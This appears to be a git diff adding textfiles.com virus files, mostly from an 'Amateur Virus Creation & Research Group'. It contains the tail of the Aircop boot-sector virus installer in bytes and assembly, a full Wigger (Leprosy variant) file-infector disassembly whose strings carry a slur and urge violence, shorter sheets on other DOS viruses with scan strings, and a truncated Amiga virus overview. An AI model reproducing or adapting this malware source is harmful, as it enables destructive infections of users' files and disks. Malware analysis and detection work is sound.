04H,0B4H, 09H,0CDH, 21H + DB 0BAH, 9EH, 05H,0B4H, 09H,0CDH + DB 21H,0B8H, 00H, 4CH,0CDH + DB 21H +DATA_3 DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 0DH, 0AH, 'Attention: This virus ' + DB 'sample uses only in research tea' + DB 'ms.', 0DH, 0AH, ' Plea' + DB 'se do not use in joking or setti' + DB 'ng trap on someone.', 0DH, 0AH, 0DH + DB 0AH, 'Warning! This file installs' + DB ' "$' + DB '" into your 360K disk!', 0DH, 0AH + DB 0DH, 0AH + DB 7 +DATA_6 DB '$' + DB 'Put a 360K (Blank Formatted) dis' + DB 'k into drive A:', 0DH, 0AH, 'Str' + DB 'ike any key to install, or CTRL-' + DB 'BREAK to quit.', 0DH, 0AH, '$' + DB 'Aircop Virus$' + DB 'Cannot read boot record.', 0DH, 0AH + DB 07H, 24H +DATA_10 DB 'Cannot write boot record.', 0DH, 0AH + DB 7, '$' +DATA_11 DB 'AIRCOP Test Version: Property of' + DB ' The RABID Nat', 27H, 'nl Develo' + DB 'pment Corp. ', 27H, '91', 0DH, 0AH + DB ' $' + DB 0DH, 0AH, 0DH, 0AH, 0DH, 0AH, 'Ca' + DB 'nnot write virus boot record', 0DH + DB 0AH + DB 7 + DB '$' + DB ' was installed into this 360K di' + DB 'sk. BE CAREFUL!', 0DH, 0AH, '$' + DB 512 DUP (0) + DB 0EBH + DB '4', 90H, 'IBM 3.3' + DB 00H, 02H, 02H, 01H, 00H, 02H + DB 70H, 00H,0D0H, 02H,0FDH, 02H + DB 00H, 09H, 00H, 02H, 00H + DB 19 DUP (0) + DB 12H, 00H, 00H, 00H, 00H, 01H + DB 00H,0FAH, 33H,0C0H, 8EH,0D8H + DB 8EH,0D0H,0BBH, 00H, 7CH, 8BH + DB 0E3H, 1EH, 53H,0FFH, 0EH, 13H + DB 04H,0CDH, 12H,0B1H, 06H,0D3H + DB 0E0H, 8EH,0C0H, 87H, 06H, 4EH + DB 00H,0A3H,0ABH, 7DH,0B8H, 28H + DB 01H, 87H, 06H, 4CH, 00H,0A3H + DB 0A9H, 7DH, 8CH,0C0H, 87H, 06H + DB 66H, 00H,0A3H,0AFH, 7DH,0B8H + DB 0BBH, 00H, 87H, 06H, 64H, 00H + DB 0A3H,0ADH, 7DH, 33H,0FFH, 8BH + DB 0F3H,0B9H, 00H, 01H,0FCH,0F3H + DB 0A5H,0FBH, 06H,0B8H, 85H, 00H + DB 50H,0CBH, 53H, 32H,0D2H,0E8H + DB 70H, 00H, 5BH, 1EH, 07H,0B4H + DB 02H,0B6H, 01H,0E8H, 8AH, 00H + DB 72H, 10H, 0EH, 1FH,0BEH, 0BH + DB 00H,0BFH, 0BH, 7CH,0B9H, 2BH + DB 00H,0FCH,0F3H,0A6H, 74H, 07H +LOC_7: + POP BX + POP AX + PUSH CS + MOV AX,0AFH + PUSH AX + +LOC_RET_8: + RETF ; Return far +LOC_9: + PUSH CS + POP DS + MOV SI,1DBH + CALL SUB_1 ; (08AA) + XOR AH,AH ; Zero register + INT 16H ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + XOR AX,AX ; Zero register + INT 13H ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + PUSH CS + POP ES + MOV BX,20DH + MOV CX,6 + XOR DX,DX ; Zero register + MOV AX,201H + INT 13H ; Disk dl=drive a ah=func 02h + ; read sectors to memory es:bx + JC LOC_9 ; Jump if carry Set + MOV CX,0FF0H + MOV DS,CX + JMP CS:DATA_2 ; (97DC:01AD=0CD4CH) + +AIRCOP ENDP + +;========================================================================== +; SUBROUTINE +;========================================================================== + +SUB_1 PROC NEAR +LOC_10: + MOV BX,7 + CLD ; Clear direction + LODSB ; String [si] to al + OR AL,AL ; Zero ? + JZ LOC_RET_14 ; Jump if zero + JNS LOC_11 ; Jump if not sign + XOR AL,0D7H + OR BL,88H +LOC_11: + CMP AL,20H ; ' ' + JBE LOC_12 ; Jump if below or = + MOV CX,1 + MOV AH,9 + INT 10H ; Video display ah=functn 09h + ; set char al & attrib bl @curs +LOC_12: + MOV AH,0EH + INT 10H ; Video display ah=functn 0Eh + ; write char al, teletype mode + JMP SHORT LOC_10 ; (08AA) + +;==== External Entry into Subroutine ====================================== + +SUB_2: + MOV BX,200H + MOV CX,2 + MOV AH,CL + CALL SUB_5 ; (08ED) + MOV CX,2709H + XOR BYTE PTR ES:[BX],0FDH + JZ LOC_13 ; Jump if zero + MOV CX,4F0FH +LOC_13: + JMP SHORT LOC_RET_14 ; (08F7) + NOP + +;==== External Entry into Subroutine ====================================== + +SUB_3: + MOV AH,2 + MOV BX,200H + +;==== External Entry into Subroutine ====================================== + +SUB_4: + MOV CX,1 + +;==== External Entry into Subroutine ====================================== + +SUB_5: + MOV DH,0 + +;==== External Entry into Subroutine ====================================== + +SUB_6: + MOV AL,1 + +;==== External Entry into Subroutine ====================================== + +SUB_7: + PUSHF ; Push flags + CALL CS:DATA_1 ; (97DC:01A9=21CDH) + +LOC_RET_14: + RETN +SUB_1 ENDP + + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH ES + PUSH DS + PUSH SI + PUSH DI + PUSHF ; Push flags + PUSH CS + POP DS + CMP DL,1 + JA LOC_16 ; Jump if above + AND AX,0FE00H + JZ LOC_16 ; Jump if zero + XCHG AL,CH + SHL AL,1 ; Shift w/zeros fill + ADD AL,DH + MOV AH,9 + MUL AH ; ax = reg * al + ADD AX,CX + SUB AL,6 + CMP AX,6 + JA LOC_16 ; Jump if above + PUSH CS + POP ES + CALL SUB_3 ; (08E5) + JC LOC_15 ; Jump if carry Set + MOV DI,43H + MOV SI,250H + MOV CX,0EH + STD ; Set direction flag + REPE CMPSB ; Rep zf=1+cx >0 Cmp [si] to es:[di] + JZ LOC_16 ; Jump if zero + SUB SI,CX + SUB DI,CX + MOV CL,33H ; '3' + REP MOVSB ; Rep when cx >0 Mov [si] to es:[di] + CALL SUB_2 ; (08CB) + PUSH CX + PUSH BX + CALL SUB_3 ; (08E5) + MOV AH,3 + XOR BX,BX ; Zero register + CALL SUB_4 ; (08EA) + POP BX + POP CX + JC LOC_15 ; Jump if carry Set + MOV DH,1 + MOV AH,3 + CALL SUB_6 ; (08EF) +LOC_15: + XOR AX,AX ; Zero register + CALL SUB_7 ; (08F1) +LOC_16: + MOV AH,4 + INT 1AH ; Real time clock ah=func 04h + ; read date cx=year, dx=mon/day + CMP DH,9 + JNE LOC_17 ; Jump if not equal + MOV SI,1B1H + CALL SUB_1 ; (08AA) +LOC_17: + POPF ; Pop flags + POP DI + POP SI + POP DS + POP ES + POP DX + POP CX + POP BX + POP AX + JMP CS:DATA_1 ; (97DC:01A9=21CDH) + POP CX + IN AL,DX ; port 100H + ADD AL,DH + DB 0F2H,0E6H, 00H,0F0H,0DAH,0DDH + DB 20H, 83H,0BFH,0BEH,0A4H,0F7H + DB 0BEH,0A4H,0F7H, 96H,0BEH,0A5H + DB 0B4H,0B8H,0A7H,0DAH,0DDH, 00H + DB 'IO SYSMSDOS SYS', 0DH, 0AH + DB 'Non-system disk or disk error', 0DH + DB 0AH + DB 00H, 00H, 55H,0AAH + +SEG_A ENDS + + + + END START +----------------------------------------------------------------------------- + + This virus was written for research purposes and RABID development +Corp. can in no way take responsibility for any damage done. + ST diff --git a/textfiles.com/virus/avcr-01.008 b/textfiles.com/virus/avcr-01.008 new file mode 100644 index 00000000..ec488218 --- /dev/null +++ b/textfiles.com/virus/avcr-01.008 @@ -0,0 +1,452 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + Research of the wigger virus + by + Security Threat + +Name: Wigger +----------------------------------------------------------------------------- +Alias: +----------------------------------------------------------------------------- +Type Of Code: Not Informed +----------------------------------------------------------------------------- +VSUM Information: No info found on WIGGER.COM +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported wigger.com as leprosy + +(2) +Frisk Software's F-Protect (F-PROT) reported wigger.com as leprosy.b + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) reported wigger.com as leprosy.b + +(4) +MicroSoft Anti Virus (MSAV.EXE) reported wigger.com as "the leprosy virus" +----------------------------------------------------------------------------- +Execution Results: Infects all COM and EXE files. +----------------------------------------------------------------------------- +Cleaning Recommendations: Impossible. Infected programs must be deleted +----------------------------------------------------------------------------- +Researcher's Notes: As infecting either reads "program to big to fit in +memory" or "You have noticed wiggers seem to have taken over the high school +scene." "If you see one, please hit him with your car". It is a variant of +leprosy. Also "News flash","Plague","viper","busted","leprosy-c", +"leprosy-d", "scribble","seneca","surfer","xarbras",and "angel of death" +----------------------------------------------------------------------------- + Disassembly of the wigger Virus + PAGE 60,132 + + + + +; CODE_SEG_1 + +CODE_SEG_1 segment para public + assume CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1 + + + org 100h + + +; +; +; ENTRY POINT +; +; + + +; +; +; PROCEDURE proc_start +; +; + +proc_start proc far +start: ; N-Ref=0 + call near ptr proc_2 + jmp loc_5 +proc_start endp + + + +var1_106 db 0 + +; +; +; PROCEDURE proc_1 +; +; + +proc_1 proc near + mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0 + push BX + call near ptr proc_2 + pop BX + mov CX,29Ah + mov DX,offset var1_100 + mov AH,40h ; '@' + int 21h ; DOS func ( ah ) = 40h + ; Write to file or device + ;BX-file handle + ; CX-bytes to read DS:DX-DTA + ;if CF=0 AX-bytes read + ; else AX-ret code + call near ptr proc_2 + retn +proc_1 endp + + + +; +; +; PROCEDURE proc_2 +; +; + +proc_2 proc near + mov BX,offset var1_131 +loc_1: ; N-Ref=1 + mov AH,Byte Ptr [BX] + xor AH,Byte Ptr var1_106 ; [6556:0106] = 8B00h + mov Byte Ptr [BX],AH + inc BX + cmp BX,3CBh + jle loc_1 ; Jump if not greater ( <= ) + retn +proc_2 endp + + + +var1_131 db '*.EXE' + db 0 +var1_137 db '*.COM' + db 0 +var1_13d db 2Eh, 2Eh, 0 +var1_140 db 0Dh, 0Ah + db 'Program too big to fit in memory$' +var1_163 db 0Dh, 0Ah, 9, 0C9h + db 66 dup (0CDh) + db 0BBh, 20h, 24h +var1_1ac db 0Dh, 0Ah, 9, 0BAh + db 20h, 20h, 57h +var1_1b3 db 'e Have Noticed That Wiggers Seem To Have' +loc_2: ; N-Ref=0 + and Byte Ptr [SI+61h],DL + +var1_1de db 'ken Over The High ' + db 0BAh, 20h, 24h +var1_1f5 db 0Dh, 0Ah, 9, 0BAh +var1_1f9 db ' School Scen' +var1_207 db 'e. If You See One, Please Hit Him With Your Car! ' + db ' ' + db 0BAh, 20h, 24h +var1_23e db 0Dh, 0Ah +loc_3: ; N-Ref=0 + or AX,CX + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + mov SP,2420h + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL +loc_5: ; N-Ref=4 + mov AH,2Ch ; ',' + int 21h ; DOS func ( ah ) = 2Ch + ; Get time + ;CL-min CH-hours DH-seconds + ; DL-1/100 of secs + cmp Byte Ptr var1_106,0 ; [6556:0106] = 8B00h + je loc_6 ; Jump if equal ( = ) + cmp DH,0Fh + jnle loc_7 ; Jump if greater ( > ) +loc_6: ; N-Ref=1 + cmp DL,0 + je loc_5 ; Jump if equal ( = ) + mov Byte Ptr var1_106,DL ; [6556:0106] = 8B00h +loc_7: ; N-Ref=1 + mov Byte Ptr var1_29b,0 ; [6556:029B] = 0 + mov Byte Ptr var1_29c,4 ; [6556:029C] = 0 + mov Byte Ptr var1_2a5,0 ; [6556:02A5] = 0B400h +loc_8: ; N-Ref=1 + mov CX,27h + mov DX,offset var1_131 + mov AH,4Eh ; 'N' + int 21h ; DOS func ( ah ) = 4Eh + ; FIND FIRST: Start file search + ;CX-attr to search on + ; DS:DX-ASCIIZ string + ;if CF=1 AX-ret code + cmp AX,12h + je loc_9 ; Jump if equal ( = ) + call near ptr proc_3 +loc_9: ; N-Ref=1 + mov CX,27h + mov DX,offset var1_137 + mov AH,4Eh ; 'N' + int 21h ; DOS func ( ah ) = 4Eh + ; FIND FIRST: Start file search + ;CX-attr to search on + ; DS:DX-ASCIIZ string + ;if CF=1 AX-ret code + cmp AX,12h + je loc_10 ; Jump if equal ( = ) + call near ptr proc_3 +loc_10: ; N-Ref=1 + mov DX,offset var1_13d + mov AH,3Bh ; ';' + int 21h ; DOS func ( ah ) = 3Bh + ; CHDIR: Change directory + ;DS:DX-ASCIIZ string + ;AX-ret code if CF set + dec Byte Ptr var1_29c ; [6556:029C] = 0 + jne loc_8 ; Jump if not equal ( != ) + jmp loc_15 + +; +; +; PROCEDURE proc_3 +; +; + +proc_3 proc near +loc_11: ; N-Ref=1 + mov BX,80h + mov AX,Word Ptr [BX+15h] + mov Word Ptr var1_2a1,AX ; [6556:02A1] = 0 + mov AX,Word Ptr [BX+16h] + mov Word Ptr var1_29d,AX ; [6556:029D] = 0 + mov AX,Word Ptr [BX+18h] + mov Word Ptr var1_29f,AX ; [6556:029F] = 0 + mov DX,9Eh + mov CX,0 + mov AL,1 + mov AH,43h ; 'C' + int 21h ; DOS func ( ah ) = 43h + ; CHMOD:Get/set file attributes + ;AL-(0/1)get/set code CX-attrib + ; DS:DX-ASCIIZ string + ;if CF=1 AX-ret code + ; CX-attrib if set used + mov AL,2 + mov AH,3Dh ; '=' + int 21h ; DOS func ( ah ) = 3Dh + ; Open file + ;CX-acsess code + ; DS:DX-ASCIIZ string + ;AX-file handle + ; if CF=1 AX-error code + mov Word Ptr var1_2a3,AX ; [6556:02A3] = 0 + mov BX,AX + mov CX,14h + mov DX,offset var1_287 + mov AH,3Fh ; '?' + int 21h ; DOS func ( ah ) = 3Fh + ; Read from file or device + ;BX-file handle + ; CX-bytes to read DS:DX-DTA + ;if CF=0 AX-bytes read + ; else AX-ret code + mov BX,offset var1_287 + mov AH,Byte Ptr var1_106 ; [6556:0106] = 8B00h + mov Byte Ptr [BX+6],AH + mov SI,offset var1_100 + mov DI,offset var1_287 + mov AX,DS + mov ES,AX + cld ; Clear direction flag + repz cmpsb ; Repeat if ZF = 1, CX > 0 + ; Cmp byte at DS:SI to ES:DI + jne loc_14 ; Jump if not equal ( != ) + call near ptr proc_4 + inc Byte Ptr var1_29b ; [6556:029B] = 0 +loc_12: ; N-Ref=1 + mov AH,4Fh ; 'O' + int 21h ; DOS func ( ah ) = 4Fh + ; FIND NEXT: Continue file search + ;DS:DX-info from FIND FIRST + ; or prev FIND NEXT + ;if CF=1 AX-ret code + cmp AX,12h + je loc_13 ; Jump if equal ( = ) + jmp short loc_11 +loc_13: ; N-Ref=1 + retn +loc_14: ; N-Ref=1 + mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0 + mov AH,3Eh ; '>' + int 21h ; DOS func ( ah ) = 3Eh + ; Close file handle + ;BX-file handle + ;if CF=1 AX-ret code + mov AH,3Dh ; '=' + mov DX,9Eh + mov AL,2 + int 21h ; DOS func ( ah ) = 3Dh + ; Open file + ;CX-acsess code + ; DS:DX-ASCIIZ string + ;AX-file handle + ; if CF=1 AX-error code + mov Word Ptr var1_2a3,AX ; [6556:02A3] = 0 + call near ptr proc_1 + call near ptr proc_4 + inc Byte Ptr var1_2a5 ; [6556:02A5] = 0B400h + dec Byte Ptr var1_29c ; [6556:029C] = 0 + je loc_15 ; Jump if equal ( = ) + jmp short loc_12 +proc_3 endp + + + + db 0C3h + +; +; +; PROCEDURE proc_4 +; +; + +proc_4 proc near + mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0 + mov CX,Word Ptr var1_29d ; [6556:029D] = 0 + mov DX,Word Ptr var1_29f ; [6556:029F] = 0 + mov AL,1 + mov AH,57h ; 'W' + int 21h ; DOS func ( ah ) = 57h + ; Get/set file date and time + ;AL-(0/1)get/set flag BX-handle + ; CX/DX-time/date,if AL=1 + ;if CF=1 AX-extended err code + ; CX/DX-time/date if AL=0 + mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0 + mov AH,3Eh ; '>' + int 21h ; DOS func ( ah ) = 3Eh + ; Close file handle + ;BX-file handle + ;if CF=1 AX-ret code + mov CX,Word Ptr var1_2a1 ; [6556:02A1] = 0 + mov AL,1 + mov DX,9Eh + mov AH,43h ; 'C' + int 21h ; DOS func ( ah ) = 43h + ; CHMOD:Get/set file attributes + ;AL-(0/1)get/set code CX-attrib + ; DS:DX-ASCIIZ string + ;if CF=1 AX-ret code + ; CX-attrib if set used + retn +proc_4 endp + + +loc_15: ; N-Ref=2 + cmp Byte Ptr var1_29b,6 ; [6556:029B] = 0 + jl loc_16 ; Jump if less ( < ) + cmp Byte Ptr var1_2a5,0 ; [6556:02A5] = 0B400h + jnle loc_16 ; Jump if greater ( > ) + mov AH,9 + mov DX,offset var1_163 + int 21h ; DOS func ( ah ) = 9 + ; Display string + ;DS:DX-output string + mov DX,offset var1_1ac + int 21h ; DOS func ( ah ) = 9 + ; Display string + ;DS:DX-output string + mov DX,offset var1_1f5 + int 21h ; DOS func ( ah ) = 9 + ; Display string + ;DS:DX-output string + mov DX,offset var1_23e + int 21h ; DOS func ( ah ) = 9 + ; Display string + ;DS:DX-output string + jmp short loc_17 + + db 90h +loc_16: ; N-Ref=2 + mov AH,9 + mov DX,offset var1_140 + int 21h ; DOS func ( ah ) = 9 + ; Display string + ;DS:DX-output string +loc_17: ; N-Ref=1 + mov AH,4Ch ; 'L' + int 21h ; DOS func ( ah ) = 4Ch + ; Terminate process + ;AL-ret code + + dw 7 dup (9090h) + db 90h +CODE_SEG_1 ends + + + + end start +----------------------------------------------------------------------------- + This seems to be similar to the leprosy B code except for encryption +and strings displayed. + ST diff --git a/textfiles.com/virus/avcr-01.009 b/textfiles.com/virus/avcr-01.009 new file mode 100644 index 00000000..54a21d3d --- /dev/null +++ b/textfiles.com/virus/avcr-01.009 @@ -0,0 +1,62 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + +Name Of Virus: Connie +----------------------------------------------------------------------------- +Alias: Connie.A (From TBAV 6.26) +----------------------------------------------------------------------------- +Type Of Code: Encrypted with Debugger Trap, Uses Dark Slayer's Mutation Eng. +----------------------------------------------------------------------------- +VSUM Information: (NONE) +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported files as infected with Connie.A + +(2) +Frisk Software's F-Protect (F-PROT) reported infected files as Nothing. + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) reported infected files as nothing. + +(4) +MicroSoft Anti Virus (MSAV.EXE) reported infected files as nothing. +----------------------------------------------------------------------------- +Execution Results: +On it's first run, it hits Command.Com Immediately. It traces back to +find where the boot (command.com) was loaded, and then tries to infect +it. It does not change dates or times on infected files, but you will +notice an increase of 1761 bytes in each infected file. This virus will +only hit .COM files, and once executed, goes memory resident. + +----------------------------------------------------------------------------- +Cleaning Recommendations:TBAV's TBCLEAN can easily remove it +----------------------------------------------------------------------------- +Researcher's Notes: +Connie will hit all Com files that are executed or copied. It will hit +the original file, and also the copied file as it is moved. + +It hooks Int's 21, 30, ED, EE, F0, F5, F6, F9, and FD. + +Connie sits in memory at location 09F240 - 09FFFF... (High as it can go) + + -The W$l- diff --git a/textfiles.com/virus/avcr-01.010 b/textfiles.com/virus/avcr-01.010 new file mode 100644 index 00000000..871a09de --- /dev/null +++ b/textfiles.com/virus/avcr-01.010 @@ -0,0 +1,74 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + +Name Of Virus: OOHLALA2 +----------------------------------------------------------------------------- +Alias: None +----------------------------------------------------------------------------- +Type Of Code: Encrypte EXE & COM infector, Non-Mem-resident +----------------------------------------------------------------------------- +VSUM Information - (NONE) +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported infected files as "Possible Virus" + +(2) +Frisk Software's F-Protect (F-PROT) reported infected files as Nothing. + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) reported infected files as nothing. + +(4) +MicroSoft Anti Virus (MSAV.EXE) reported infected files as nothing. +----------------------------------------------------------------------------- +Execution Results: +Upon execution, it displays the following- + "Ohhhh La La! + Mommmy, Theyre Teasing me again + Shut up you little sonsuvbitches" + Then plays a nice little tune. +Before the tune starts, it nails 6 files total, COM & EXE... Either one. + +----------------------------------------------------------------------------- +Cleaning Recommendations:Delete Infected or TBAV (using Anti-Vir.dat..) +----------------------------------------------------------------------------- +My Notes: +This virus is a non-resident infector of EXE & COM files, except Command.com. +It will not (that I found) infect files under 1K in size of either ext. +EXE's show up as 1960 larger than before, but COM files didn't until I +rebooted the PC... (?) Maybe My PC glitched... I Dunno... + +----------------------------------------------------------------------------- + Disassembly of the OOHLALA2 Virus +----------------------------------------------------------------------------- +I found all EXE files to contain this string... +"BF 10 01 06 1E 06 89 FE 81 EE 00 01 32 E4" + +All COM files had.... +"BF ?8 ?? 06 1E 06 89 FE 81 EE 00 01 32 E4" + +So, just add this to your scanner... No problemo.... +"06 1E 06 89 FE 81 EE 00 01 32 E4" +----------------------------------------------------------------------------- + + 'Till next time, I'm The W$l, and you're not....... diff --git a/textfiles.com/virus/avcr-01.011 b/textfiles.com/virus/avcr-01.011 new file mode 100644 index 00000000..2c44a822 --- /dev/null +++ b/textfiles.com/virus/avcr-01.011 @@ -0,0 +1,90 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + +Name Of Virus: TWISTER VIRUS +----------------------------------------------------------------------------- +Alias: Twistone +----------------------------------------------------------------------------- +Type Of Code: Unknown +----------------------------------------------------------------------------- +VSUM Information - (NONE) +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported twister.com as "Possible Virus" + +(2) +Frisk Software's F-Protect (F-PROT) reported twister.com as "Seems to be +infected with unknown" + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) reported twister.com as clean. + +(4) +MicroSoft Anti Virus (MSAV.EXE) reported twister.com as clean. +----------------------------------------------------------------------------- +Execution Results: +It nails 1 Com file every time it's executed, (or the infected file is +executed), It loads into the systems Master Boot Record (In Sector 195 +as near as I can tell). +It hooks Int. 2 (NMI) - 8 (Timer) - 9 (Keyboard) - 0E (Diskette) - +22 (Dos Terminate) - 23 (Dos Ctrl-C) - 24 (Fatal Error Handler) - 2E +(File Execute) - 2F (Program Multiplex) +I Can't find a specific address it's loading at yet.. I'm still working + +----------------------------------------------------------------------------- +Cleaning Recommendations:Delete Infected or TBAV (using Anti-Vir.dat..) +----------------------------------------------------------------------------- +Researcher's Notes: +Here's the Scan string to add to your AV software for Twister... +8B F6 90 90 B8 01 FA BA 45 59 CD 16 E8 00 + +----------------------------------------------------------------------------- + Disassembly of the 'Twister' Orig. Virus, (Raw format) +----------------------------------------------------------------------------- + +000000: 8B F6 90 90 B8 01 FA BA 45 59 CD 16 E8 00 00 5D ........EY..... +000010: 81 ED 0F 01 8D 9E 22 02 FF 37 43 43 FF 37 B4 1A ......"..7CC.7. +000020: 8D 96 26 02 CD 21 CC B4 4E 8D 96 1A 02 CD 21 72 ..&..!..N.....! +000030: 03 EB 04 90 E9 C3 00 B4 2F CD 21 33 C0 8D 77 1E ......../.!3..w +000040: AC 0A C0 75 FB 83 EE 04 AC 3C 43 74 03 E9 A5 00 ...u......!.O./...... +000100: 21 BB 02 01 8F 07 4B 4B 8F 07 53 33 C0 33 DB 33 !.....KK..S3.3. +000110: C9 33 D2 33 ED 33 F6 33 FF C3 2A 2E 2A 00 E9 00 .3.3.3.3..*.*.. +000120: 00 90 CD 20 00 00 00 00 00 00 00 00 54 68 61 6E ... ........Tha +000130: 6B 73 20 74 6F 20 56 69 70 65 72 2C 20 4D 65 6D ks to Viper, Me +000140: 6F 72 79 20 4C 61 70 73 65 00 00 00 00 00 00 00 ory Lapse...... + +It uses through E9 (on line 000110) when it infects. + + L8r, dudez... + -The W$l diff --git a/textfiles.com/virus/avcr-01.012 b/textfiles.com/virus/avcr-01.012 new file mode 100644 index 00000000..59f3eefd --- /dev/null +++ b/textfiles.com/virus/avcr-01.012 @@ -0,0 +1,63 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + +Name Of Virus: VLAMIX 1.0 +----------------------------------------------------------------------------- +Alias: +----------------------------------------------------------------------------- +Type Of Code: Encrypted with Debugger Trap +----------------------------------------------------------------------------- +VSUM Information - (NONE) +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported Vlamix.EXE as "Possible Virus" + +(2) +Frisk Software's F-Protect (F-PROT) reported Vlamix.exe as Nothing. + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) reported Vlamix.exe as nothing. + +(4) +MicroSoft Anti Virus (MSAV.EXE) reported Vlamix.exe as nothing. +----------------------------------------------------------------------------- +Execution Results: +On it's first run, it hits 4 exe files in the current directory, and +disables them. Thunderbyte will run after it's hit, but it won't show +or tell you that it has been modified and/or infected. Upon the usual +sanity check it does, the system locks up. It is memory resident and +uses an undocumented dos interrupt to check for itself in memory. +----------------------------------------------------------------------------- +Cleaning Recommendations:Delete Infected or TBAV (using Anti-Vir.dat..) +----------------------------------------------------------------------------- +Researcher's Notes: +Here's the Scan string to add to your scanner to catch this one.... +06 1E 8C C8 8E D8 BF 28 00 A1 50 04 31 05 + +----------------------------------------------------------------------------- + Disassembly of the VLAMIX Virus +----------------------------------------------------------------------------- + +Thunderbyte 6.26 can't properly ID or name this one, so just add +it to your scanner. + + -The Weaz diff --git a/textfiles.com/virus/avirus.txt b/textfiles.com/virus/avirus.txt new file mode 100644 index 00000000..3dc39213 --- /dev/null +++ b/textfiles.com/virus/avirus.txt @@ -0,0 +1,76 @@ + +THE SCA VIRUS: --------------------- The original. The one that +started all this craziness. It hids in memory, attaching itself to +ANY disk you boot off of.Prints the infamous "Something wonderful has +happened...",etc., etc. Install all disks that have it and then +reboot from a cold start or from a warm start HOLDING down the LEFT +miuse button.This puts it to death. + +BYTE BANDIT VIRUS: --------------------- What the Byte Bandit virus +does is once it's in memory, it copies itself to just above the high +memory pointer on the first hunk of RAM it can find (Which means it's +not always in the same place), wedges itself into the Interrupt Server +chain, into the Trackdisk.device's vectors,and creates itself a +Resident structure so it can hang around after reboot. It watches +EVERY disk inserted, and will write itself to ANY bootable disk that +is inserted! This one can spread like wildfire - every disk you +insert into your external drive during a session with this Virus +loaded will result in all those disks being infected. Ouch. Also, if +you Install a disk while this virus is going, it will just copy itself +back to the disk - which is why it has to be wiped from memory to be +destroyed. + +The REVENGE VIRUS: ---------------------- This virus is not yet +common in North America (I think Steve Tibbett is the first person +here to have a copy of it), but it is apparently making the rounds in +Sweden and Germany.What this virus does, is everything that the Byte +Bandit virus does,PLUS, after infecting a disk, it will wait one +minute after every reboot, and change your mouse pointer into an image +of a certain part of the Male anatomy. 8-) I think the reason this +virus is called the "Revenge" virus is because it looks specifically +for the Byte Bandit and for the SCA Virus. If it finds either of +these, it Rigs THAT virus so that it will CRASH the machine unless +THIS virus is loaded first. Note that I might be wrong about this - +that's the way it looks from the disassembly,- but be warned,in case +it pops up later or something. He stays in RAM via changing the +CoolCapture vector to point to his own code. He then intercepts the +DoIO() call and watches for any attempts to rewrite or to read the +boot block and acts accordingly.He also has an interrupt around +counting VBlanks until it's time to bring up his sicko pointer. To +get this virus out of memory is Simple - Hold down the Joystick button +(Plug a joystick into port 2, and hold down the button while you are +rebooting), and the screen will briefly turn RED during the boot, and +it's out of memory. (If you hold down Joystick button AND mouse +button, it will half-remove himself from RAM and turn the screen +Blue). + +THE BYTE WARRIOR VIRUS: ------------------------- The Byte Warrior +Virus is a lot like the Byte Bandit virus, except it is not designed +to hurt anything - it will start an "Alarm" sound if it sees another +virus (or at least I think it does - it hasn't for me), but other than +that, it will write itself to any disk inserted. There is also a +hidden message in it, asking us to spread it around and not to erase +it. Ya, right. + +THE NORTH STAR AntiVIRUS: -------------------------- This virus +alerts you to the presence of other viruses.I think this sort of idea +is stupid because it can do just as much damage as the rest of them. + +THE OBELISK SOFTWARE CREW VIRUS: THE PENTAGON CIRCLE VIRUS: THE +SYSTEMZ VIRUS: ---------------------------------- More of the same. + +THE IRQ 